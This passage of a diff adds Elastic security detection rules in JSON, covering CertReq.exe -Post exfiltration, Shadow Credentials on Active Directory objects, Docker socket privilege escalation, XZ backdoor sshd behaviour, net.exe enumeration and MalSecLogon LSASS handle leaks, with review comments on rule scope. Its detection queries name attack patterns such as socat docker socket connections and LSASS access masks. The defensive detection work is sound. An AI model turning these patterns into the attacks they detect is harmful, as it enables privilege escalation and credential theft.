Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services 
WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unusual but can be done by administrators. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n (process.name : \"CertReq.exe\" or ?process.pe.original_file_name == \"CertReq.exe\") and process.args : \"-Post\"\n", + "references": [ + "https://lolbas-project.github.io/lolbas/Binaries/Certreq/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "79f0a1f7-ed6b-471c-8eb1-23abd6470b1c", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Command and Control", + "Tactic: Exfiltration", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": 
"Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1567", + "name": "Exfiltration Over Web Service", + "reference": "https://attack.mitre.org/techniques/T1567/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 8 + }, + "id": "79f0a1f7-ed6b-471c-8eb1-23abd6470b1c_8", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_108.json b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_108.json new file mode 100644 index 00000000000..e79970cd0f8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/79f97b31-480e-4e63-a7f4-ede42bf2c6de_108.json 
@@ -0,0 +1,100 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identify the modification of the msDS-KeyCredentialLink attribute in an Active Directory Computer or User Object. Attackers can abuse control over the object and create a key pair, append to raw public key in the attribute, and obtain persistent and stealthy access to the target user or computer object.", + "false_positives": [ + "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Shadow Credentials added to AD Object", + "note": "## Triage and analysis\n\n### Investigating Potential Shadow Credentials added to AD Object\n\nThe msDS-KeyCredentialLink is an Active Directory (AD) attribute that links cryptographic certificates to a user or computer for domain authentication.\n\nAttackers with write privileges on this attribute over an object can abuse it to gain access to the object or maintain persistence. 
This means they can authenticate and perform actions on behalf of the exploited identity, and they can use Shadow Credentials to request Ticket Granting Tickets (TGTs) on behalf of the identity.\n\n#### Possible investigation steps\n\n- Identify whether Windows Hello for Business (WHfB) and/or Azure AD is used in the environment.\n - Review the event ID 4624 for logon events involving the subject identity (`winlog.event_data.SubjectUserName`).\n - Check whether the `source.ip` is the server running Azure AD Connect.\n- Contact the account and system owners and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Review the event IDs 4768 and 4769 for suspicious ticket requests involving the modified identity (`winlog.event_data.ObjectDN`).\n - Extract the source IP addresses from these events and use them as indicators of compromise (IoCs) to investigate whether the host is compromised and to scope the attacker's access to the environment.\n\n### False positive analysis\n\n- Administrators might use custom accounts on Azure AD Connect. If this is the case, make sure the account is properly secured. You can also create an exception for the account if expected activity makes too much noise in your environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n - Remove the Shadow Credentials from the object.\n- Investigate how the attacker escalated privileges and identify systems they used to conduct lateral movement. 
Use this information to determine ways the attacker could regain access to the environment.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "event.action:\"Directory Service Changes\" and event.code:\"5136\" and\n winlog.event_data.AttributeLDAPDisplayName:\"msDS-KeyCredentialLink\" and winlog.event_data.AttributeValue :B\\:828* and\n not winlog.event_data.SubjectUserName: MSOL_*\n", + "references": [ + "https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab", + "https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials", + "https://github.com/OTRF/Set-AuditRule", + "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeValue", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "79f97b31-480e-4e63-a7f4-ede42bf2c6de", + "setup": "## Setup\n\nThe 'Audit Directory Service Changes' logging policy must be configured for (Success, Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes 
(Success,Failure)\n```\n\nThe above policy does not cover User objects, so we need to set up an AuditRule using https://github.com/OTRF/Set-AuditRule.\nAs this specifies the msDS-KeyCredentialLink Attribute GUID, it is expected to be low noise.\n\n```\nSet-AuditRule -AdObjectPath 'AD:\\CN=Users,DC=Domain,DC=com' -WellKnownSidType WorldSid -Rights WriteProperty -InheritanceFlags Children -AttributeGUID 5b47d60f-6090-40b2-9f37-2a4de88f3063 -AuditFlags Success\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 108 + }, + "id": "79f97b31-480e-4e63-a7f4-ede42bf2c6de_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_5.json b/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_5.json new file mode 100644 index 00000000000..0d8234c9b50 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_5.json 
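Review bot: The exclusion `not winlog.event_data.SubjectUserName: MSOL_*` in `query` suppresses every account whose name begins with that prefix, which is broader than the Azure AD Connect synchronization account and ADFS service account that `false_positives` describes as the legitimate sources of this change. Since the field is an account name rather than a fixed identity, the suppression is only as tight as the naming convention; pinning the exception to the known synchronization account (via a rule exception, as the `false_positives` text already recommends) rather than a wildcard prefix keeps the rule's coverage aligned with its own triage guidance. At minimum the `note` could state that the built-in `MSOL_*` exclusion exists, so analysts reviewing 5136 events for this attribute know which principals the rule never reports on.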
@@ -0,0 +1,96 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule monitors for the usage of Docker runtime sockets to escalate privileges on Linux systems. Docker sockets by default are only be writable by the root user and docker group. Attackers that have permissions to write to these sockets may be able to create and run a container that allows them to escalate privileges and gain further access onto the host file system.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Privilege Escalation through Writable Docker Socket", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n(\n (process.name == \"docker\" and process.args : \"run\" and process.args : \"-it\" and \n process.args : (\"unix://*/docker.sock\", \"unix://*/dockershim.sock\")) or \n (process.name == \"socat\" and process.args : (\"UNIX-CONNECT:*/docker.sock\", \"UNIX-CONNECT:*/dockershim.sock\"))\n) and not user.Ext.real.id : \"0\" and not group.Ext.real.id : \"0\"\n", + "references": [ + "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation#automatic-enumeration-and-escape" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "group.Ext.real.id", + "type": "unknown" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "user.Ext.real.id", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "7acb2de3-8465-472a-8d9c-ccd7b73d0ed8", 
+ "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Domain: Container", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "7acb2de3-8465-472a-8d9c-ccd7b73d0ed8_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7afc6cc9-8800-4c7f-be6b-b688d2dea248_1.json b/packages/security_detection_engine/kibana/security_rule/7afc6cc9-8800-4c7f-be6b-b688d2dea248_1.json new file mode 100644 index 00000000000..bbf9ca39902 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7afc6cc9-8800-4c7f-be6b-b688d2dea248_1.json 
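Review bot: The docker branch of `query` requires `process.args : "-it"` as a single argument, so only the combined interactive flag form is covered, while the `description` talks about creating and running a container in general; the socat branch has no such flag constraint, so the two branches cover different amounts of the behaviour the rule describes. If the flag is there to cut noise from non-interactive automation, `process.args : ("-it", "-ti")` covers the other common spelling without widening scope, and a short comment in the query explaining why the interactive flag is required would make the trade-off explicit. Separately, the `description` text "Docker sockets by default are only be writable by the root user and docker group" has a stray "be" and should read "are only writable by".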
@@ -0,0 +1,181 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "It identifies potential malicious shell executions through remote SSH and detects cases where the sshd service suddenly terminates soon after successful execution, suggesting suspicious behavior similar to the XZ backdoor.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Execution via XZBackdoor", + "query": "sequence by host.id, user.id with maxspan=1s\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.name == \"sshd\" and\n process.args == \"-D\" and process.args == \"-R\"] by process.pid, process.entity_id\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and process.parent.name == \"sshd\" and \n process.executable != \"/usr/sbin/sshd\"] by process.parent.pid, process.parent.entity_id\n [process where host.os.type == \"linux\" and event.action == \"end\" and process.name == \"sshd\" and process.exit_code != 0] by process.pid, process.entity_id\n [network where host.os.type == \"linux\" and event.type == \"end\" and event.action == \"disconnect_received\" and process.name == \"sshd\"] by process.pid, process.entity_id\n", + "references": [ + "https://github.com/amlweems/xzbot", + "https://access.redhat.com/security/cve/CVE-2024-3094" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": 
true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.exit_code", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.pid", + "type": "long" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "7afc6cc9-8800-4c7f-be6b-b688d2dea248", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Persistence", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1543", + "name": "Create or Modify System Process", + "reference": "https://attack.mitre.org/techniques/T1543/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1556", + "name": "Modify Authentication Process", + "reference": "https://attack.mitre.org/techniques/T1556/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.004", + "name": "SSH", + "reference": "https://attack.mitre.org/techniques/T1021/004/" + } + ] + }, + { + "id": "T1563", + "name": "Remote Service Session 
Hijacking", + "reference": "https://attack.mitre.org/techniques/T1563/", + "subtechnique": [ + { + "id": "T1563.001", + "name": "SSH Hijacking", + "reference": "https://attack.mitre.org/techniques/T1563/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "7afc6cc9-8800-4c7f-be6b-b688d2dea248_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_110.json b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_110.json new file mode 100644 index 00000000000..0b4fe68b2ea --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7b8bfc26-81d2-435e-965c-d722ee397ef1_110.json 
@@ -0,0 +1,120 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies attempts to enumerate hosts in a network using the built-in Windows net.exe tool.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Windows Network Enumeration", + "note": "## Triage and analysis\n\n### Investigating Windows Network Enumeration\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `net` utility to enumerate servers in the environment that hosts shared drives or printers. This information is useful to attackers as they can identify targets for lateral movements and search for valuable shared data.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. 
As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n ((process.name : \"net.exe\" or process.pe.original_file_name == \"net.exe\") or\n ((process.name : \"net1.exe\" or process.pe.original_file_name == \"net1.exe\") and\n not process.parent.name : \"net.exe\")) and\n (process.args : \"view\" or (process.args : \"time\" and process.args : \"\\\\\\\\*\"))\n\n\n /* expand when ancestry is available\n and not descendant of [process where event.type == \"start\" and process.name : \"cmd.exe\" and\n ((process.parent.name : \"userinit.exe\") or\n (process.parent.name : \"gpscript.exe\") or\n (process.parent.name : \"explorer.exe\" and\n process.args : \"C:\\\\*\\\\Start Menu\\\\Programs\\\\Startup\\\\*.bat*\"))]\n */\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + 
"name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "7b8bfc26-81d2-435e-965c-d722ee397ef1", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Collection", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1018", + "name": "Remote System Discovery", + "reference": "https://attack.mitre.org/techniques/T1018/" + }, + { + "id": "T1135", + "name": "Network Share Discovery", + "reference": "https://attack.mitre.org/techniques/T1135/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0009", + "name": "Collection", + "reference": "https://attack.mitre.org/tactics/TA0009/" + }, + "technique": [ + { + "id": "T1039", + "name": "Data from Network Shared Drive", + "reference": "https://attack.mitre.org/techniques/T1039/" + } + ] + } + ], + "timestamp_override": 
"event.ingested", + "type": "eql", + "version": 110 + }, + "id": "7b8bfc26-81d2-435e-965c-d722ee397ef1_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_208.json b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_208.json new file mode 100644 index 00000000000..4e108b5c7c7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7ba58110-ae13-439b-8192-357b0fcfa9d7_208.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies suspicious access to LSASS handle from a call trace pointing to seclogon.dll and with a suspicious access rights value. This may indicate an attempt to leak an LSASS handle via abusing the Secondary Logon service in preparation for credential access.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious LSASS Access via MalSecLogon", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\" and\n\n /* seclogon service accessing lsass */\n winlog.event_data.CallTrace : \"*seclogon.dll*\" and process.name : \"svchost.exe\" and\n\n /* PROCESS_CREATE_PROCESS & PROCESS_DUP_HANDLE & PROCESS_QUERY_INFORMATION */\n winlog.event_data.GrantedAccess == \"0x14c0\"\n", + "references": [ + "https://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html" + ], + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.CallTrace", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.GrantedAccess", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetImage", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "7ba58110-ae13-439b-8192-357b0fcfa9d7", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work 
effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 208 + }, + "id": "7ba58110-ae13-439b-8192-357b0fcfa9d7_208", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_105.json b/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_105.json new file mode 100644 index 00000000000..386767b2b89 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/7bcbb3ac-e533-41ad-a612-d6c3bf666aba_105.json 
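Review bot: The inline comment in the EQL query of 7ba58110 documents `0x14c0` as `PROCESS_CREATE_PROCESS & PROCESS_DUP_HANDLE & PROCESS_QUERY_INFORMATION`, but those three rights sum to 0x4c0 (0x80 | 0x40 | 0x400); the remaining 0x1000 bit is PROCESS_QUERY_LIMITED_INFORMATION, which Windows grants implicitly whenever PROCESS_QUERY_INFORMATION is requested. An analyst checking the mask against the comment will conclude the value is wrong, so the comment should read `/* 0x14c0 = PROCESS_CREATE_PROCESS (0x80) | PROCESS_DUP_HANDLE (0x40) | PROCESS_QUERY_INFORMATION (0x400) | PROCESS_QUERY_LIMITED_INFORMATION (0x1000, implied by QUERY_INFORMATION) */`. Separately, `winlog.event_data.GrantedAccess == "0x14c0"` is an exact string match, so a variant of the same seclogon handle-leak that requests any additional right (a superset mask) would not fire; that is a reasonable precision trade-off for the published technique, but it is worth stating in the description as a known limitation rather than leaving it implicit.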
